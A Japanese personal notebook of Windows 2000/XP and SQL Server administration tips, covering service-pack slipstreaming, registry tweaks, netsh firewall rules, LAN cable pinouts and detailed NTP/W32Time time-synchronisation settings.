サービスパック適応済みWindows2000インストールイメージの作成方法 今回は例としてWindows2000サービスパック3(以下SP3)を適応することにします。 SP2に付属するupdate.exeコマンドは実行するのにWin2000のコマンドプロンプトが必要なので 以下の作業はWindows2000で行うことにします。 まずは、元となるWindows2000インストールCDのイメージを作業用ハードディスクフォルダに コピーします。今回はDドライブの「D:WIN2K」というフォルダを作業用に作成し EドライブにCD-ROMがマウントされてると仮定します。 Windows2000のファイル群はCD-ROMの\i386フォルダ以下にあるのでハードディスク側にも 「D:WIN2K\i386」というフォルダを作成し、そこにコピーします。 D:\>mkdir \WIN2K\i386 D:\>xcopy e:\i386 d:\WIN2K\i386 /e       次に、この作業フォルダに対してSP3を適応します。 SP2をネットから落とした場合には、「w2ksp3.exe」というアーカイブファイルが手に入るので これを適当な場所に展開します。 CD-ROMならルートフォルダに「w2ksp3.exe」があるのでこれを同じく適当な場所に展開します。 今回は「D:\SP3」というフォルダに展開するとします。 コマンドラインから「w2ksp3.exe」を「/x」オプションをつけて実行すると途中で展開先を聞いてきます。 展開が完了したら展開作フォルダの中のi386\update(今回はD:\SP3\i386\update)に update.exeというコマンドが展開されています。 作業フォルダにコピーしたWindows2000インストールイメージにSP3を適用するには 適用先の作業フォルダに「-s」コマンドを付けて指定しupdate.exeを実行します。 なおこのupdate.exeはWindows2000のコマンドプロンプトか、「ファイル名を指定して実行」から 起動してください。 D:\>D:\SP3\i386\update\update.exe -s:D:\WIN2K こうすることで統合モードでupdate.exe画実行され指定先にSP3が適応されます。 実行中は下のようなダイアログが出ます。 Unattend.txt ファイルを使用して Microsoft Windows XP のライセンス認証を行う方法 Sysprep ツールを使用して Windows XP の展開を自動化する方法 Windows XP SP2 をインストールしたコンピュータで修復インストールを行う方法 また、個別のパッチも統合できるみたいです。 ソフトウェア更新プログラムを Windows インストール ソース ファイルに統合する方法
コンポーネントを追加したときに、セキュリティ更新プログラムが適応されない場合。 日本のセキュリティチームの Blog に書かれているように、MBSA でチェックしましょう。 また DLL の情報は MS サイトに DLL Help という物があります。 Windows Vista、Windows 7、Windows Server 2008、Windows Server 2008 R2 で更新プログラムをインストールできない
LANケーブルを作る。 カテゴリ 用途        備考 1    音声   2    低速の通信 音声   ISDNなど 3    10Mbpsまでの通信  音声 10−BASET 4    16Mbpsまでの通信  あまり聞かない、見かけない 5    100Mbpsまでの通信  10・100BASE-T用 8本の線の説明 各線には色がついていて、この順番にも規格があります。 T-568AとT-568Bは米国の規格で決められた配列で、ANSI/TIA/EIA-568Aでは、T-568Aが主でT-568Bを従として採用。 T-568Aの配列が多いらしいです。両端同じならどちらでも動きます。 ピン  1 2  3  4  5 6  7 8 T568A 白/緑 緑 白/橙 青 白/青 橙 白/茶 茶 T568B 白/橙 橙 白/緑 青 白/青 緑 白/茶 茶 番号 信号  色(例) 1   +TD  橙白 2   −TD  橙 3   +RD  緑白 4   未接続 青 5   未接続 青白 6   −RD  緑 7   未接続 茶白 8   未接続 茶 TDは送信、RDは受信 LANケーブルの仕組みを理解して自作せよ (1/3) http://www.itmedia.co.jp/enterprise/articles/0806/09/news019.html
SQL Server のバージョンを知る。 SQL = "select @@version as ver, @@servername as server" CMD.CommandText = SQL Set RS = CMD.Execute Response.Write RS.Fields("ver").Value 'バージョン Response.Write RS.Fields("server").Value 'サーバ名
SQL Server の設定で「大文字小文字を区別しない」になっている場合での、クエリによる区別の方法。 CONVERT コマンドで VARBINARY に指定して比較する。  例)  SELECT * FROM TABLE_NAME WHERE CONVERT(VARBINARY(20), RTRIM(Field)) = CONVERT(VARBINARY(20), '比較文字')
[NT]ANSI 以外の文字を使用した際 [含まれる文字列] で検索できない 日本語の検索は出来ないものと思って下さい。 #「予定」とか、Shift-JISコードに「0x5c」があれば #人的にエスケープすれば、検索可能です。 #こんな感じ「予\定」で。
Internet Explorer のパスワード キャッシュを無効にする方法     KEY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings     値の名前 : DisablePasswordCaching     データ型 : REG_DWORD     値    : 0x00000001 説明 : 再度パスワード キャッシュを無効にするには、レジストリの値の名前 DisablePasswordCaching を削除します。     または、値のデータを 0 に設定を変更します。 上記の設定しなくても信頼済みサイトに登録するとパスワード聞かれなくなったり・・・します。 マシンの環境によるのかな、、、どーなってるんでしょ・・・誰かしってます? パスワード保存機能の無効化     KEY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network     値の名前 : DisablePwdCaching     データ型 : REG_DWORD     値    : 0:キャッシュ有効、1:キャッシュ無効 ドメイン(.NET)キャッシュの無効化     KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa     値の名前 : DisableDomainCreds     データ型 : REG_DWORD     値    : 0:キャッシュ有効、1:キャッシュ無効
WindowsNT系への自動ログオン 下記値を追加する事で、自動ログイン可能になります。     KEY HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon     値の名前 : AutoAdminLogon     データ型 : REG_SZ     値    : 1     値の名前 : DefaultDomainName     データ型 : REG_SZ     値    : 自動ログオンしたいドメイン名     値の名前 : DefaultUserName     データ型 : REG_SZ     値    : 自動ログオンしたいユーザ名     値の名前 : DefaultPassword     データ型 : REG_SZ     値    : 自動ログオンしたいユーザ名のパスワード XP や 2003 は コマンドラインから control userpasswords2 を利用するのが簡単。 Windows XP で自動ログオンを有効にする方法 システムに自動ログオンする方法(ユーザー管理ツール編) システムに自動ログオンする方法(TweakUI編) システムに自動ログオンする(Autologonツール編)
ADOを使ってバイナリデータを出力する。 Option Explicit Response.AddHeader "Content-Disposition", "inline;filename=" & "path to the file" Response.ContentType = "application/octet-stream;" Const adTypeBinary = 1 Dim strFilePath Dim objStream strFilePath = Server.mapPath("path to the file") Set objStream = Server.CreateObject("ADODB.Stream") objStream.Open objStream.Type = adTypeBinary objStream.LoadFromFile strFilePath Response.BinaryWrite objStream.Read objStream.Close Set objStream = Nothing [HOWTO] ADODB.Stream オブジェクトを使用して ASP 経由でバイナリ ファイルをブラウザに送信する方法
PROXYを利用してIPアドレスを隠すには? 多段プロキシツール プロキシランチャー プロキシサーバリストを公開しているサイト Proxy 4 Free Proxy Bench Find Proxy Stay Invisible ree Public Proxies All Proxies ProxyMatrix PG Zone 【レビュー】アクセス元を特定不能にするTor+Polipe匿名プロキシサーバの構築方法 http://journal.mycom.co.jp/articles/2010/07/12/tor-polipo-anonymity-server/
16ビットアプリ実行時のエラーを回避(Windows XP)     KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers     値の名前 : VDD     データ型 : REG_MULTI_SZ     同じ位置にある ADD を削除し、VDDを追加する。 Windows Server 2003 または Windows 2000 Server で MS-DOS または 16 ビット Windows プログラムを実行すると "16 ビット MS-DOS サブシステム" エラー メッセージが表示される
ログオン時に「NumLock」をオンにする。     KEY HKEY_USERS\.DEFAULT\Control Panel\Keyboard     値の名前 : InitialKeyboardlndicators     データ型 : REG_SZ     値    : 2 (0:OFF/2:ON) ※NumLockをオンにした後にログアウトし、再度ログオンでも「NumLock」がオンになります。
SQL Server2000「サーバーを非表示にする」 サーバーネットワークユーティリティを起動して「TCP/IP」プロトコルの「プロパティ」を選択すると 「ネットワークプロトコル既定値の設定」でチェックボックス「サーバーを非表示」があります。  この設定は、次のレジストリに相当します KEY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp     値の名前 : TcpHideFlag     データ型 : REG_DWORD     値    : 0       このチェックボックスをオンにするかレジストリの値を 1 にして、SQL Server をリスタートすると、  SQL Server のポートは、通常の 1433/tcp ではなく 2433/tcp になります。 ポートの確認は、以下のコマンドを実行すると確認できます。 isql -S localhost,2433 -E -Q "PRINT 'OK'" サーバーの非表示を有効から無効にしても、ポート番号は、2433 のままになりますので 1433 に明示的に修正する必要があります。 「サーバーの非表示」を有効にしても、1434/udp は、LISTEN になっていますので 1434/udp を LISTEN したくない場合は、TCP/IP プロトコルを含むプロトコルすべてを 無効にするか、IPSec やファイアウォールで防御する必要があります。
Serverサービスが利用するメモリー量やネットワーク速度を調整する。 Windows 2000/XP Professional KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters     値の名前 : Size     データ型 : REG_DWORD     値    : 1 1:メモリーの使用を最小化する場合 2:バランスを取る場合 3:ネットワーク帯域の使用を最大化する場合 Server の場合は[ローカルエリア接続]の[Microsoftネットワーク用ファイルとプリンタ共有]で設定可能 ちなみに SQL Server をインストールすると、「ネットワーク帯域の使用を最大化する場合」に変わります。 http://msdn2.microsoft.com/ja-jp/library/ms191471.aspx
Windows 2000 Pro , Windows XP Home/Pro でファイアウォールを設定。 汎用ポートスキャンツール Nmap http://www.insecure.org/nmap/ タスクマネージャのプロセスと、netstat コマンドを利用する事で 外部に接続しているアプリケーションを調べる事は出来ます。 コマンドラインから、  netstat -a -n -o (TASKLIST /SVC がいいかも。) 表示された PID と タスクマネージャの PID を比較する。 Windows XP では、標準で「インターネット接続ファイアウォール」が 実装されています。 マイクロソフトが提供するポートスキャンツールもあります。 PortqryV2.exe http://www.microsoft.com/downloads/details.aspx?FamilyID=89811747-c74b-4638-a2d5-ac828bdc6983&DisplayLang=en このあたりを参考に。http://www.atmarkit.co.jp/fwin2k/win2ktips/314listen/listen.html ここも役にたつかな。http://isc.sans.org/ ネットワークモニタリングツールを製作する 第1回 SNMPの仕組みを理解する http://www.pc-view.net/Network/040213/index.html 2000/2003 Server 系では、「ルーティングとリモートアクセス」の機能の一部として パケットフィルタリングを実装しています。 Windows 2000 Pro , Windows XP Home/Pro でも利用できますが Server に入っているグラフィカルなインターフェイスは在りません。 これを有効にするには、管理ツールのサービスで 「Routing and Remote Access」を有効にします。  Workstation, Server サービスにも依存するので  これも動作させておく必要があります。 パケットフィルタリングは、 Netsh コマンドで設定する事になります。 PC を防御する場合は、この組み合わせが有効です。 Webブラウジングと電子メールの利用の場合は、 Netsh 実行後 routing ip set filter "ローカル エリア接続" input drop routing ip set filter "ローカル エリア接続" output drop routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=icmp type=8 code=0 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=icmp type=0 code=0 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=udp type=53 dstport=0 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=udp type=67 dstport=68 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp-est type=80 dstport=0 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp-est type=25 dstport=0 routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp-est type=110 dstport=0 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=icmp type=8 code=0 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=icmp type=0 code=0 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=udp type=0 dstport=53 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=udp type=68 dstport=67 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp type=0 dstport=80 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp type=0 dstport=443 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp type=0 dstport=25 routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0 proto=tcp type=0 dstport=110 こんな感じの設定となります。 パケットフィルタリングを戻したい場合は、 netsh routing ip set filter "ローカル エリア接続" input forward netsh routing ip set filter "ローカル エリア接続" output forward と、コマンドラインを実行してから 「Routing and Remote Access」を無効化すれば OK です。 これでも心配な場合は、市販のファイアウォール製品を導入して下さい。 完璧なセキュリティ対策は存在しません。 Web、電子メール、ウイルス対策、ファイアウォール、全ての面で気を抜かないよう 注意して下さい。 ポート一覧  PORT NUMBERS  http://www.iana.org/assignments/port-numbers  インターネット プロトコル番号  http://support.microsoft.com/kb/289892  Windows 2000 で TCP/IP フィルタリングを構成する方法  http://support.microsoft.com/kb/309798
ルーティングとリモート アクセスのイベント ID の一覧 ルーティングとリモート アクセス サービスのイベント ID 一覧 イントラネット用にルーティングとリモート アクセスを設定する方法
SQL 文で昇順にした時の NULL や "" を最後に持ってくるには、、、 ORDER BY CASE WHEN FIELD IS NULL THEN '1' WHEN FIELD = '' THEN '1' ELSE '0' + FIELD END
イベント ビューア ログ ファイルを別の場所に移動するには・・・  イベント ビューア ログ ファイルをハード ディスクの別の場所に移動するには、以下の手順を実行します。  1.[スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。  2・[名前] ボックスに regedit と入力し、[OK] をクリックします。  3.次のレジストリ キーを探して、クリックします。    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog  4.移動するイベント ログを表すサブキーをクリックします。たとえば、[Application] をクリックします。  5.右側のウィンドウで、[File] をダブルクリックします。  6.[値のデータ] ボックスに新しい場所への完全なパス (ログ ファイル名を含めます) を入力し、[OK] をクリックします。    たとえば、アプリケーション ログ (Appevent.evt) を E ドライブの Eventlogs フォルダに移動する場合は、    e:\eventlogs\appevent.evt と入力します。  7.移動するログ ファイルごとに手順 4. 〜 6. を実行します。  8.[レジストリ] メニューの [レジストリ エディタの終了] をクリックします。  9.コンピュータを再起動します。  ちなみに、Windows Server 2008 ではログのプロパティから変更できます。  また、「イベントを上書きしないでログをアーカイブする」という項目が追加されています。
SQL Server 2000 のトリガテンプレートを初期化するには    HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\SQLEW      にある[TriggerTemplate]のキーを削除する。 -- [INF] SQL Server のメモリ使用量 http://support.microsoft.com/?id=321363 -- 昇順並び替えで空白行を最後に持っていくには ORDER BY CASE WHEN FIELD IS NULL THEN '1' WHEN FIELD = '' THEN '1' ELSE '0' + FIELD END -- 検索条件によっては、違う文字を誤認識する。 NLS (National Language Support) 機能に問題が在る。 .NET の String.Compare では "aー" = "aa" SQL の場合は独自実装なので、少し異なり "々" = "ー" となる。COLLATE のバグ PASSJ セキュリティ分科会ボードリーダの河端さんがまとめています。 http://blogs.sqlpassj.org/yoshihirokawabata/archive/2004/06/07/2625.aspx
Mac をネットワークに参加させるには AppleTalk over TCP/IP (AFT2.2) から AppleTalk は TCP/IP の上で実現しています。 TCP ポートは 548 番。ルータ Firewall の TCP ポート 548 をあければネット上で共有可能。
シャットダウンの待ち時間を短くする レジストリ エディタ (Regedit.exe) を起動します。   次のレジストリ キーを見つけてクリックします。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control     値の名前 : WaitToKillServiceTimeout     データ型 : REG_SZ     値    : 20000           応答のないサービスの待ち時間を短縮したい場合は、この値を変更する。           値は待ち時間でミリ秒。
時刻あわせ NTP サーバ一覧として  Public NTP Time Servers  http://www.eecis.udel.edu/~mills/ntp/servers.html 国内公開 ntp サイト一覧 サイトリスト(ntpsites) ntp1.jst.mfeed.ad.jp # 日本のインターネット環境に正確な時刻を提供することを目的とした実験で設置された ntp2.jst.mfeed.ad.jp # 公共 NTP。日本標準時を決める原子時計から時刻を得た stratum 1 サーバと同期した ntp3.jst.mfeed.ad.jp # stratum 2 サーバ群。www.jst.mfeed.ad.jp 参照。                 # ※ mfeed は 2012年2月29日でサービス終了になります。ご注意。 sutns.sut.ac.jp # 東京理科大学 stratum 2。外部公開をやめた ntp.sut.ac.jp に同期。 ntp.wakayama-u.ac.jp # 和歌山大学 stratum 2。ntp2.tohoku.ac.jp に同期している。 ns.hiroshima-u.ac.jp # 広島大学 stratum 3。広島大のサーバは正体の良く分からない上流サーバに ntp.hiroshima-u.ac.jp # 同期していることがよくあります。 # よくあります、というのは、上流サーバがしばしば変わり、 # それも時間帯によって使い分けている印象があるためです。 # しかし、このようなサーバでも十分に信用できてしまうのが ntp の良いところなのです。 stratum 1 サーバ これらは stratum 2 である mfeed.ad.jp と同時に利用しない方が良い gpsntp.miz.nao.ac.jp # 国立天文台 GPS の stratum 1 clock.nc.fukuoka-u.ac.jp # 福岡大学鶴岡研 stratum 1。http://www.tl.fukuoka-u.ac.jp/Lab/tsuruoka/ drake.nc.fukuoka-u.ac.jp # 同上 eagle.center.osakafu-u.ac.jp # 大阪府立大学 stratum 1 ntp1.tohoku.ac.jp # 東北大学 stratum 1 ntp2.tohoku.ac.jp # 同上 ntp.tut.ac.jp # 豊橋技術科学大学 stratum 1。 事実上公開。 # http://www.cc.tut.ac.jp/netservice/NTP/index.html を参照。 # http://www.cc.tut.ac.jp/netservice/NTP/ntpstats.html でクライアント情報をモニター。 ntp.nc.u-tokyo.ac.jp # 東京大学 stratum 1 geo.gen.u-ryukyu.ac.jp # 琉球大学 stratum 1   タイムサーバと同期間隔を指定する     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters     値の名前 : NtpServer     データ型 : REG_SZ     値    : タイムサーバ名またはIPアドレス, 同期モード            指定可能な同期モード            0x1: SpecialPollInterval レジストリ値を使用して同期間隔を決定            0x2: 同期失敗時の予備タイムサーバ(フォールバックタイムソース)として使用            0x4: 対称アクティブモードで同期要求を送信            0x8: クライアントモードで同期要求を送信                 値の名前 : Type     データ型 : REG_SZ     値    : NTP、NT5DS、NoSync                 NTP:  ユーザ指定のタイムサーバ(SNTPサーバーを含む)            NT5DS: ドメインの階層に従う            NoSync: 同期を行わない   時刻合わせの間隔を短くする     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient     値の名前 : SpecialPollInterval     データ型 : REG_DWORD     値    : 600(10分間隔)           値は秒でデフォルトは1週間(604800)ドメイン環境では 1時間(3600)   0x1 がないタイムサーバと同期する場合     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config     値の名前 : MaxPollInterval     データ型 : REG_DWORD     値    : 15(ドメイン環境では10)            最長同期間隔。2 の n 乗 でデフォルトは 32768秒     値の名前 : MinPollInterval     データ型 : REG_DWORD     値    : 10(ドメイン環境では6)            最短同期間隔。2 の n 乗 でデフォルトは 1024秒   Active Directory と時刻同期     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters     値の名前 : SkewTime     データ型 : REG_DWORD     値    : 5 (分)   時刻の修正許容範囲     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config    進める範囲を調整     値の名前 : MaxPosPhaseCorrection     データ型 : REG_DWORD     値    : 54000(秒)ドメイン環境では 0xFFFFFFFF(無制限)    戻す範囲を調整     値の名前 : MinPosPhaseCorrection     データ型 : REG_DWORD     値    : 54000(秒)ドメイン環境では 0xFFFFFFFF(無制限)  W32Timeサービスのレジストリエントリ  http://support.microsoft.com/default.aspx?scid=kb;ja;223184  ※ W32Time (Windows Time Synchronization サービス) は、IETF RFC 1769 で詳述    されているように、SNTP (Simple Network Time Protocol) に完全準拠した実装  http://support.microsoft.com/default.aspx?scid=kb;JA;224799  NTPでネットワーク全体の時刻を合わせる  http://www.atmarkit.co.jp/fwin2k/win2ktips/050nettime/nettime.html  ※ このサイトも NTP と SNTP がごっちゃになっている為、内容に重大な誤りがある。 SNTP サーバを使った時刻同期は、時刻が戻る可能性があるので、絶対やっては いけません。時刻が戻ってしまうと、上記の話と同じで、トランザクションロ グの整合性が保てません。 時刻同期させる場合は、NTP の slew モードで行う。  時刻が大きく変更されないように Windows タイム サービスを構成する方法  http://support.microsoft.com/kb/884776/ja  w32tmコマンドとレジストリによるWindows Timeサービスの制御 − @IT  http://www.atmarkit.co.jp/fwin2k/operation/winntp203/winntp203_04.html Windows2000 上で動作する NTP、SNTP クライアントとしては 「桜時計」(http://www.venus.dti.ne.jp/~uno/) 「xntp 3.x/ntp 4.x」(http://www.eecis.udel.edu/~ntp/ ) 「AdjustPC」(http://www.geocities.co.jp/SiliconValley-PaloAlto/5362/ ) が有名。 アクセス制御が有効なプロキシで Windows 2000 および Windows Server 2003 のタイム サービスが動作しない Windows XP で権限のあるタイム サーバーを構成する方法 Windows Server 2003 で権限のあるタイム サーバーを構成する方法  ネットワーク上の外部タイムサーバを参照して権限のあるタイムサーバに設定する場合  ・Type レジストリ を NTP にする  ・AnnounceFlags レジストリを 5 にする  ・Enabled レジストリを 1 にする  ・NtpServer レジストリを IPアドレス, 0x1 にする  ・SpecialPollInterval レジストリを適切な値にする  ・MaxPosPhaseCorrection, MinPosPhaseCorrection レジストリを適切な値にする  ・設定を反映させる為、W32Time サービスの再起動    ドメインコントローラ(フォレスト・ルート・ドメイン)を構成した場合に    同期が取れず Time-Service で イベントID 12 や 144 が警告として上がる    ので上記設定に変更するかタイムサーバを変更しておく必要がある。    ※動作の確認はしてませんのでコマンドから変更する場合は確認すること。    例)    Type を NTP に    確認     REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v Type    変更     REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v Type /t REG_SZ /d NTP /f    AnnounceFlags を 5 に    確認     REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Config" /v AnnounceFlags    変更     REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Config" /v AnnounceFlags /t REG_DWORD /d 5 /f    NtpServer に登録    確認     REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v NtpServer    変更     REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v NtpServer /t REG_SZ /d ntp.nict.jp,0x1 ntp.jst.mfeed.ad.jp,0x1 /f     ・インターネットマルチフィード http://www.jst.mfeed.ad.jp/service/02.html     ・独立行政法人情報通信研究機構(NICT) http://jjy.nict.go.jp/ntp/     を利用する場合     DNS 名の解決を発生させないようにIPアドレスで指定     NTP サーバをラウンドロビンで参照するようになっている場合はホスト名を指定    最後にサービスの再起動    net stop w32time & net start w32time  クライアントモードでしか要求を受け付けない外部のタイムサーバと同期する場合は  同期要求を対称アクティブモードからクライアントモードに変更する   W32TM /config /manualpeerlist:NTPサーバ, 0x8 /syncfromflags:MANUAL   net stop w32time   net start w32time   W32TM /resync   0x8 がクライアントモードで同期要求するパラメータ    ブラジルの夏時間を構成する方法 標準時間形式に Active Directory 内の日時属性を変換する方法 Windows タイム サービスのデバッグ ログを有効にする方法 W32Time により頻繁にイベント ID 50 がイベント ログに記録され Windows Server 2003 および Windows XP で時刻の同期に失敗する Windows XP または Windows Server 2003 を実行しているコンピュータからネットワークに接続するとき、接続の問題が断続的に発生する Windows Server 2003 で Windows 以外の NTP サーバーとの同期が成功しない 時刻が大きく変更されないように Windows タイム サービスを構成する プロバイダ・機関別(wiki@nothing) インターネットマルチフィード「時刻情報提供サービス for Public」の提供開始について 日本標準時プロジェクトサイト ※64bit OS 利用時は、サービスが安定していない NICT は利用しない方が良いです。 世界最高性能のインターネット用時刻同期サーバによる日本標準時配信の開始  NICT 公開 NTP サービス (インターネット経由) Windowsネットワーク時刻同期の基礎とノウハウ(改訂版)  第1回 Windows OSにおける時刻同期サービスとNTP  http://www.atmarkit.co.jp/fwin2k/operation/winntp01/winntp01_01.html  第2回 w32timeデバッグ・ログとw32tmコマンド  http://www.atmarkit.co.jp/fwin2k/operation/winntp02/winntp02_01.html time.windows.com が不調らしい。 http://isc.sans.org/diary.php?date=2005-05-20 http://isc.sans.org/diary.php?date=2005-05-21 ※64bit OS で 利用するアプリ と NICT の公開サービスの組み合わせは、NICTのサービス復旧時のタイミングで時計を 1900/01/01 09:00:02 とかにされますのでご注意。  時刻異常時に stratum 情報を確認しない NTP クライアント側の問題かな。 こんな恐ろしいことに・・・ 一足早く、2036年問題 を体験。 Network Time Protocol - Wikipedia http://ja.wikipedia.org/wiki/Network_Time_Protocol NTPとWindows時刻同期サービス − @IT http://www.atmarkit.co.jp/fwin2k/operation/winntp201/winntp201_01.html 電波時計で時刻同期  C-dex社 の JST2000 が 19800円で買えます。  http://www.c-dex.co.jp/ 2007年から米国のサマータイム(夏時間、DST:Daylight Saving Time)期間が 3月の第2日曜から11月の第1日曜までに延長されます。  変更前 4月 第1日曜日〜10月 最終日曜日      「4月の第1日曜日の午前 2時に時計を 1時間進め、      10月の最終日曜日の午前 2時に時計を 1時間戻す」  変更後 3月 第2日曜日〜11月 第1日曜日      「3月の第1日曜日の午前 2時に時計を 1時間進め、      11月の第1日曜日の午前 2時に時計を 1時間戻す」  2007 年の夏時間変更のための準備:Microsoft  http://support.microsoft.com/gp/cp_dst Windows VISTA、2008 Server では、再起動を繰り返すとシステム時刻がずれるようで HPET(High Precision Event Timer)の問題っぽい。  The system time lags when you restart a Windows Vista-based computer that supports High Precision Event Timer  http://support.microsoft.com/kb/933272 W32Time を無効にしておくのが吉。 BIOS 上で hpet を disable にすると直るかも(未確認) 2009.1.1 はうるう秒注入で1秒長くなるそうで。。。  「うるう秒」挿入のお知らせ〜 来年の元日はいつもより「1秒」長い1日です 〜  http://www2.nict.go.jp/pub/whatsnew/press/h20/080912/080912-1.html  うるう秒に関する Windows タイム サービスの処理  http://support.microsoft.com/kb/909614/ja 時刻同期プロトコル「NTP」にDoS攻撃を受ける脆弱性 http://japan.zdnet.com/news/sec/story/0,2000056194,20405087,00.htm AdjustPC には、受信データのサーバーIPをチェックする項目があります。 Windows Server 2008 または Windows Server 2008 R2 で W32Time サービスが正常に起動する場合でも、時間の同期は実行されません。 http://support.microsoft.com/kb/2493006 Windows 7 および Windows Server 2008 R2 のスタンドアロン環境で Windows Time サービスが自動的に起動しない http://support.microsoft.com/kb/2385818 NTP サーバーと最後に時刻を同期した時間が異なる http://support.microsoft.com/kb/2604300 Windowsネットワーク時刻同期の基礎とノウハウ(改訂版):NTP時刻同期サービスのトラブルシューティング (1/3) - @IT http://www.atmarkit.co.jp/ait/articles/1301/24/news105.html
SQL Server のデータベースを移動させる。 SQL Server では、データベースを作成するとデータフォルダに *.MDF *.LDF の2つが作成されます。 このファイルをコピーします(SQL サーバが稼動中はコピーできません) 新しく立てた SQL Server にこのファイルをコピーします。 クエリアナライザを使ってインポートします。 (sp_detach_db/sp_attach_db コマンドを利用) 書き方は以下の通り。 /* データベースを切り離す場合 */ sp_detach_db 'db' go /* データベースをアタッチする */ sp_attach_db 'ncs', @filename1 = 'F:\Microsoft SQL Server\MSSQL\Data\DB_Data.MDF', @filename2 = 'F:\Microsoft SQL Server\MSSQL\Data\DB_Log.LDF' go SQL Server データベースをデタッチとアタッチにより新しい場所に移動する [HOWTO] SQL Server を実行しているコンピュータ間でデータベースを移動する方法
LDF ファイルが破損してアタッチ出来ない場合の修復方法  1.同じデータベースを作成  2.SQL Server を停止  3.MDF ファイルを上書き  4.SQL Server を機動  5.DBCC CHECKDB を使ってログの再構築    dbcc checkdb('database_name', noindex repair_allow_data_loss)    dbcc rebuild_log でも OK?  参考  http://msdn.microsoft.com/library/ja/tsqlref/ts_dbcc_00gy.asp  http://msdn2.microsoft.com/ja-jp/library/ms176064.aspx
トランザクションログを縮小したい。 DBCC SHRINKFILEコマンドを使用するとファイルサイズを小さくすることができます。  使い方は以下のページを参考に。  データベース オプションの設定
SQL Server 関連そのた。 ◆SQL に関する Q&A  http://www.microsoft.com/technet/technetmag/issues/2007/03/SQLQA/default.aspx?loc=jp/ ◆エラー メッセージ "SQL Server が存在しないか、アクセスが拒否されました" の原因  http://support.microsoft.com/default.aspx?scid=kb;ja;328306   SQL Server 2005 Tips and Tips 第 1 回 ネットワーク接続を有効化しよう   http://www.microsoft.com/japan/sql/ssj/tips/01.mspx  cliconfig を実行すると、つながるんだとか。。。 ◆SQL Server 2000 ローカル データベースのネットワーク接続をセキュリティで保護する方法  http://support.microsoft.com/default.aspx?scid=kb;ja;814130 ◆SQLの管理 http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/adminsql/ad_mon_perf_6zg3.asp ◆「SQL Server 監視ツールの基本操作」 http://www.sqlpassj.org/tokushu/dba/default.aspx(PASSJ) ◆ビキナー http://www.sqlpassj.org/bunkakai/begin/default.aspx(PASSJ) ◆プロファイラを使ってみよう http://www.sqlpassj.org/tokushu/dba/01.aspx(PASSJ) SQL Server 2000でいってみよう 